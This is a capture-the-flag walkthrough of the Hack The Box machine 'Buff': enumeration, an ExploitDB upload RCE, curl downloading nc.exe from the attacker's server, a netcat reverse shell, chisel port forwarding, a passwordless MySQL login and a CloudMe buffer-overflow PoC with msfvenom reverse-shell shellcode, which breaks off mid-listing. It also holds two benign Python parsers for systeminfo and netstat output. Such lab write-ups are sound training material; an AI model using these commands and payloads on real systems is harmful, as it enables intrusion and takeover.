Buff (HTB)

nmap

# Nmap 7.92 scan initiated Tue Nov 23 15:49:13 2021 as: nmap -Pn -sCV -p- -oN buff 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.074s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 23 15:53:35 2021 -- 1 IP address (1 host up) scanned in 261.93 seconds

gobuster

[tyco㉿4YE: ~/htb/buff/scans]$ gobuster dir -u http://10.10.10.198:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt,sh -o gobuster -k

/img                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/img/]
/home.php             (Status: 200) [Size: 143] 
/about.php            (Status: 200) [Size: 5337]
/index.php            (Status: 200) [Size: 4969]
/profile              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/profile/]
/contact.php          (Status: 200) [Size: 4169]
/register.php         (Status: 200) [Size: 137] 
/feedback.php         (Status: 200) [Size: 4252]
/upload               (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/upload/]
/upload.php           (Status: 200) [Size: 107] 
/edit.php             (Status: 200) [Size: 4282]
/license              (Status: 200) [Size: 18025]
/up.php               (Status: 200) [Size: 209] 
/packages.php         (Status: 200) [Size: 7791]
/examples             (Status: 503) [Size: 1058]
/include              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/include/]
/licenses             (Status: 403) [Size: 1203]
/facilities.php       (Status: 200) [Size: 5961]

unauthenticated remote code execution (RCE)

From the Contact page, I was able to enumerate that this gym website was mrb3n's Bro Hut (the browser tab title says the same) running on Gym Management Software 1.0.

The first search result was an unauthenticated RCE vulnerability on ExploitDB. The vulnerability lies in the /upload.php endpoint: the upload handler never checks for a valid user session, so anyone can upload files without logging in. This means that we can upload a malicious payload to get a reverse shell onto the system.

[tyco㉿4YE: ~/htb/buff/scans]$ python 48506.py http://10.10.10.198:8080/

/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>

On Windows systems, the first things I do are run whoami /all and systeminfo: the first shows which groups and privileges the shaun user has, and the second gives the Windows version and patch level so I can check whether there are any known vulnerabilities.

C:\xampp\htdocs\gym\upload> whoami /all

USER INFORMATION                                  
----------------

User Name  SID                                           
========== ==============================================
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                     Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
C:\xampp\htdocs\gym\upload> systeminfo

Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 14:05:58
System Boot Time:          23/11/2021, 23:58:05
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 19/06/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,430 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,268 MB
Virtual Memory: In Use:    2,531 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.198
                                 [02]: fe80::3db3:5dce:8187:de70
                                 [03]: dead:beef::20b
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

I copied this systeminfo output back to Kali to use a tool called Windows Exploit Suggester (WES). WES takes the output of systeminfo, compares the installed hotfixes against a database of Microsoft security bulletins, and lists the bulletins that are unaccounted for along with any public exploits for them.

[tyco㉿4YE: ~/htb/buff]$ python windows-exploit-suggester.py --update

[*] initiating winsploit version 3.3...
[+] writing to file 2021-11-23-mssb.xls
[*] done
[tyco㉿4YE: ~/htb/buff]$ python windows-exploit-suggester.py --database 2021-11-23-mssb.xls --systeminfo systeminfo

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension                                              
[*] attempting to read from the systeminfo input file                                                                 
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities                                                              
[*] comparing the 0 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns                                                                                       

[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'                                                                 


[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255


[E] MS16-129: Cumulative Security Update for Microsoft Edge (3199057) - Critical                        
[*]   https://www.exploit-db.com/exploits/40990/ -- Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
[*]   https://github.com/theori-io/chakra-2016-11


[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)


[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato                                                                     
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation


[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC


[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC


[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java Script Stack Walker Memory Corruption (MS15-056)
[*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java Script Stack Walker memory corruption



[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)


[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC


[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC


[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC


[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*]   https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC 


[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*]   https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)


[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*]   https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC


[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*]   https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC


[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*]   https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
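To make the comparison WES performs concrete, here is an added example (my own code for this write-up, not Windows Exploit Suggester's) that parses systeminfo output and reports which bulletins have no matching KB installed. The first systeminfo sample is a trimmed copy of the Buff output above; the second is constructed to show the patched branch. The bulletin table holds three entries taken from the WES output above (bulletin id and the KB number in parentheses); WES itself uses the full Microsoft bulletin spreadsheet it downloads with --update.

```python
"""Patch-gap check over `systeminfo` output, in the spirit of what WES does.

Added example for this write-up; not Windows Exploit Suggester's code.
The bulletin table is a hand-built subset (ids and KB numbers from the
WES output in the write-up); the second systeminfo sample is constructed.
"""
import re

# Trimmed copy of the systeminfo output captured on Buff.
SYSTEMINFO_BUFF = """\
Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
"""

# Constructed sample of the same build with two of the KBs installed.
SYSTEMINFO_PATCHED = """\
Host Name:                 BUFF-PATCHED
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3143141
                           [02]: KB3136041
"""

# bulletin id -> (KB that ships the fix, OS family it applies to)
BULLETINS = {
    "MS16-135": ("KB3199135", "Windows 10"),
    "MS16-032": ("KB3143141", "Windows 10"),
    "MS16-016": ("KB3136041", "Windows 10"),
}


def parse_systeminfo(text):
    """Extract OS name, version, build, architecture and installed KBs.

    systeminfo prints `Key:  value` lines; multi-valued keys such as
    Hotfix(s) continue on indented `[NN]: ...` lines, so the parser
    remembers the key it last saw to attribute those continuation lines.
    """
    info = {"os_name": "", "os_version": "", "build": None, "arch": "", "hotfixes": []}
    current_key = None
    for line in text.splitlines():
        m = re.match(r"^(\S[^:]*):\s*(.*)$", line)
        if m:
            current_key, value = m.group(1).strip(), m.group(2).strip()
            if current_key == "OS Name":
                info["os_name"] = value
            elif current_key == "OS Version":
                info["os_version"] = value.split()[0] if value else ""
                b = re.search(r"Build (\d+)", value)
                info["build"] = int(b.group(1)) if b else None
            elif current_key == "System Type":
                info["arch"] = "x64" if "x64" in value else "x86"
        elif current_key == "Hotfix(s)":
            # "N/A" on the key line means no continuation lines follow;
            # otherwise each indented line carries one KB number.
            kb = re.search(r"\b(KB\d+)\b", line)
            if kb:
                info["hotfixes"].append(kb.group(1))
    return info


def missing_bulletins(info, bulletins=BULLETINS):
    """Bulletin ids whose OS family matches the host and whose KB is absent."""
    installed = set(info["hotfixes"])
    return sorted(
        bid for bid, (kb, family) in bulletins.items()
        if family in info["os_name"] and kb not in installed
    )


if __name__ == "__main__":
    for text in (SYSTEMINFO_BUFF, SYSTEMINFO_PATCHED):
        info = parse_systeminfo(text)
        print(f"{info['os_name']} {info['os_version']} ({info['arch']}), "
              f"{len(info['hotfixes'])} hotfix(es) listed")
        for bid in missing_bulletins(info):
            print(f"  {bid}: {BULLETINS[bid][0]} not installed")
```

Two caveats a practitioner should keep in mind: a newer cumulative update supersedes the individual KBs in the table, so a KB that is absent by name is a lead rather than a confirmed missing patch, and WES also matches on the version and architecture columns of the bulletin spreadsheet, which this subset ignores.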

manual enumeration

getting a new, better shell

Looking at the suggestions, I did not think any of these would work. Most of the ones listed here are for older Windows systems. I did go through each just to see if it was usable, but they did not look exploitable. Unfortunately, the shell you get from the initial exploit is very limited. I could not create or change directories, so I created another reverse shell from within the current shell. curl was present on Buff, so I could use it to transfer the netcat executable over.

[tyco㉿4YE: ~/htb/buff]$ locate nc.exe

/home/tyco/htb/buff/nc.exe
/home/tyco/htb/granny/nc.exe
/home/tyco/htb/optimum/nc.exe
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe

The executable is located at /usr/share/windows-resources/binaries/nc.exe, so I copied it to my working directory and hosted it with a Python HTTP server so that the Buff machine could fetch it with curl.

[tyco㉿4YE: ~/htb/buff]$ cp /usr/share/windows-resources/binaries/nc.exe .
[tyco㉿4YE: ~/htb/buff]$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
PS C:\Users\shaun> curl 10.10.14.15:8000/nc.exe -o nc.exe

With the netcat executable on the Buff machine, we are going to use it to create another reverse shell.

PS C:\Users\shaun> nc.exe 10.10.14.15 4445 -e powershell

That command connects back to your Kali IP, so have a listener running to pick up the shell:

[tyco㉿4YE:~/htb/buff]$ rlwrap nc -nvlp 4445

listening on [any] 4445 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.198] 50029
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

finding internal ports

Now with that all set up, I started to manually enumerate the system. I began in the user shaun's home directory and ran dir -s, which recursively lists the files in every folder beneath it. There were 2 files of interest: Tasks.bat and CloudMe_1112.exe.

PS C:\Users\shaun> dir -s

Directory: C:\Users\shaun\Documents
Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----       16/06/2020     22:26             30 Tasks.bat                                                              

Directory: C:\Users\shaun\Downloads
Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe
PS C:\Users\shaun> type Documents\Tasks.bat
START C:/xampp/xampp_start.exe

A quick search for "cloudme 1112 exploit" turned up a buffer overflow exploit for version 1.11.2 of CloudMe. This looks promising, and might be the route we head down.

I continued enumerating by checking for services that were only listening internally on the system. I ran netstat -ano (the -b flag, which would add the owning executable, requires administrative rights).

netstat stands for network statistics, and shows information on ports and TCP/UDP connections. Running netstat with no flags only shows established connections, i.e. those that have already completed the handshake, so listening sockets are left out. The following flags add the details needed for enumeration:

  • -a: shows all TCP/UDP connections, including listening ports
  • -n: shows IP addresses and port numbers instead of resolving hostnames and service names
  • -o: shows the process ID (PID) that owns each connection
  • -b: shows the executable that created the connection (requires administrative rights)

PS C:\xampp\htdocs\gym\upload> netstat -ano

Active Connections

Proto  Local Address          Foreign Address        State
TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       3204
TCP    10.10.10.198:8080      10.10.14.15:51882      CLOSE_WAIT      3204
TCP    10.10.10.198:8080      10.10.14.15:51892      ESTABLISHED     3204
TCP    127.0.0.1:3306         BUFF:0                 LISTENING       1252
TCP    127.0.0.1:8888         BUFF:0                 LISTENING       6900

The netstat output shows port 8080, which the gym website runs on. A local address of 0.0.0.0 means the listener is bound to all network interfaces, which is why we can reach the site from our browser. The Foreign Address column shows the IP and port of the remote end of each connection; here they come from my Kali IP. There are also 2 interesting ports bound only to 127.0.0.1, so they are reachable only from the box itself: 3306 is MySQL, and some other service is listening on 8888.

I also ran tasklist, which lists the running processes on the system. Two processes were interesting to me: MySQL (mysqld.exe) and CloudMe (CloudMe.exe) are both running.

PS C:\xampp\htdocs\gym\upload> tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
mysqld.exe                    1252                            0      4,444 K
CloudMe.exe                   8508                            0     18,024 K
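The useful part of this step is joining the two outputs: netstat tells you which port is bound to which address and PID, and tasklist tells you which image owns that PID. The following is an added example (my own code, not part of the original write-up) that parses both outputs and classifies each listener by exposure. The sample text is copied from the netstat and tasklist output above, with a PID column header, an httpd.exe row for PID 3204, a svchost.exe row and one UDP line added as constructed data so that the join and the UDP case (no State column) can be shown.

```python
"""Join `netstat -ano` listeners with `tasklist` process names.

Added example for this write-up. The sample text below is taken from the
write-up's netstat/tasklist output; the httpd.exe, svchost.exe and UDP
rows are constructed additions so the join has something to resolve.
"""
import re

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       3204
  TCP    10.10.10.198:8080      10.10.14.15:51882      CLOSE_WAIT      3204
  TCP    10.10.10.198:8080      10.10.14.15:51892      ESTABLISHED     3204
  TCP    127.0.0.1:3306         BUFF:0                 LISTENING       1252
  TCP    127.0.0.1:8888         BUFF:0                 LISTENING       6900
  UDP    0.0.0.0:5353           *:*                                    1480
"""

TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
httpd.exe                     3204 Services                   0     12,000 K
mysqld.exe                    1252                            0      4,444 K
svchost.exe                   1480 Services                   0      8,000 K
CloudMe.exe                   8508                            0     18,024 K
"""


def parse_netstat(text):
    """Return one dict per TCP/UDP row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[0], parts[1], parts[2]
        # UDP rows have no State column, so the PID is taken from the end.
        state = parts[3] if proto == "TCP" else ""
        pid = int(parts[-1])
        addr, port = local.rsplit(":", 1)  # rsplit keeps IPv6 "[::]" intact
        rows.append({"proto": proto, "addr": addr, "port": int(port),
                     "foreign": foreign, "state": state, "pid": pid})
    return rows


def parse_tasklist(text):
    """Return {pid: image name}; the Session Name column may be blank."""
    procs = {}
    for line in text.splitlines():
        m = re.match(r"^(\S.*?)\s+(\d+)\s+", line)
        if m:
            procs[int(m.group(2))] = m.group(1)
    return procs


def exposure(addr):
    """Classify a bind address: who can reach this listener?"""
    if addr in ("0.0.0.0", "[::]"):
        return "all interfaces"
    if addr.startswith("127.") or addr == "[::1]":
        return "loopback only"
    return "specific interface"


def listeners(netstat_text, tasklist_text):
    """Listening sockets joined with their owning process, sorted by port."""
    procs = parse_tasklist(tasklist_text)
    out = []
    for r in parse_netstat(netstat_text):
        if r["proto"] == "TCP" and r["state"] != "LISTENING":
            continue
        out.append({"port": r["port"], "proto": r["proto"], "addr": r["addr"],
                    "exposure": exposure(r["addr"]),
                    "process": procs.get(r["pid"], f"unknown (PID {r['pid']})")})
    return sorted(out, key=lambda x: x["port"])


if __name__ == "__main__":
    for l in listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"{l['proto']} {l['addr']}:{l['port']:<5} {l['exposure']:<18} {l['process']}")
```

Running it reports 8080 as reachable on all interfaces and 3306/8888 as loopback only, which is exactly why the latter two needed a tunnel. It also shows that the write-up's two snapshots do not line up: port 8888 is owned by PID 6900, while tasklist lists CloudMe.exe as PID 8508, so the join reports the owner as unknown rather than guessing. Capture netstat and tasklist back to back when you want the join to be reliable.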

reverse forwarding the internal ports

Normally on Linux, I would use SSH to forward these ports to my Kali machine, but that won't work here, since SSH port forwarding from Windows would require credentials for the current account.

I used chisel to forward the local ports to my Kali machine. Download both the Linux and Windows versions: the Linux executable runs as the server on Kali, and the Windows executable is the client that connects back to Kali and exposes the remote ports.

SERVER (LINUX): ./chisel server --reverse --port 4445
CLIENT (WINDOWS): .\chisel.exe client 10.10.14.15:4445 R:3306:localhost:3306 R:8888:localhost:8888

With the chisel server running on Kali, run the chisel client on Buff to open up the two ports. Both sides should report the connection:

PS C:\Users\shaun> .\chisel.exe client 10.10.14.15:4445 R:3306:localhost:3306 R:8888:localhost:8888

2021/11/24 04:14:27 client: Connected (Latency 202.2782ms)
[tyco㉿4YE: ~/htb/buff]$ ./chisel server --reverse --port 4445
2021/11/23 19:58:56 server: Reverse tunnelling enabled
2021/11/23 19:58:56 server: Fingerprint TzUF5zd5ccYcMud5O5HpCFSfWdGxhN5+oDhVVkozBh0=
2021/11/23 19:58:56 server: Listening on http://0.0.0.0:4445
2021/11/23 20:03:02 server: session#1: tun: proxy#R:3306=>localhost:3306: Listening
2021/11/23 20:03:02 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening

MySQL database

Now, let's access the MySQL database from our Kali machine through the forwarded port:

[tyco㉿4YE: ~/htb/buff]$ mysql -u root -p -h 127.0.0.1

Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 131
Server version: 10.4.11-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

We got in with the default root account that has no password!

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| table              |
| test               |
+--------------------+
6 rows in set (1.146 sec)

MariaDB [table]> use phpmyadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

MariaDB [phpmyadmin]> show tables;
+------------------------+
| Tables_in_phpmyadmin   |
+------------------------+
| pma__bookmark          |
| pma__central_columns   |
| pma__column_info       |
| pma__designer_settings |
| pma__export_templates  |
| pma__favorite          |
| pma__history           |
| pma__navigationhiding  |
| pma__pdf_pages         |
| pma__recent            |
| pma__relation          |
| pma__savedsearches     |
| pma__table_coords      |
| pma__table_info        |
| pma__table_uiprefs     |
| pma__tracking          |
| pma__userconfig        |
| pma__usergroups        |
| pma__users             |
+------------------------+
19 rows in set (0.164 sec)

There was nothing interesting in the phpmyadmin database, so I moved on to CloudMe. Let's take a look at the PoC and see if the exploit works.

CloudMe service

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

We see here that the exploit expects the CloudMe service to be reachable on 127.0.0.1 (target = "127.0.0.1"). Thanks to the chisel reverse forward, the loopback port on Kali now leads to the service on Buff, so all we have to do is run the script.

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

This portion of the exploit is the shellcode produced by the commented msfvenom command, which just launches calc.exe. We are going to replace this part with our own payload to get a reverse shell.

[tyco㉿4YE: ~/htb/buff]$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=4447 -b '\x00\x0A\x0D' -f python

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders                               
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai                                                                                                                                                                        
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes                                    
Final size of python file: 1712 bytes
buf =  b""                                                 
buf += b"\xdb\xd3\xd9\x74\x24\xf4\x58\xbb\xc1\x90\x6c\x82\x29"
buf += b"\xc9\xb1\x52\x83\xc0\x04\x31\x58\x13\x03\x99\x83\x8e"
buf += b"\x77\xe5\x4c\xcc\x78\x15\x8d\xb1\xf1\xf0\xbc\xf1\x66"
buf += b"\x71\xee\xc1\xed\xd7\x03\xa9\xa0\xc3\x90\xdf\x6c\xe4"
buf += b"\x11\x55\x4b\xcb\xa2\xc6\xaf\x4a\x21\x15\xfc\xac\x18"
buf += b"\xd6\xf1\xad\x5d\x0b\xfb\xff\x36\x47\xae\xef\x33\x1d"
buf += b"\x73\x84\x08\xb3\xf3\x79\xd8\xb2\xd2\x2c\x52\xed\xf4"
buf += b"\xcf\xb7\x85\xbc\xd7\xd4\xa0\x77\x6c\x2e\x5e\x86\xa4"
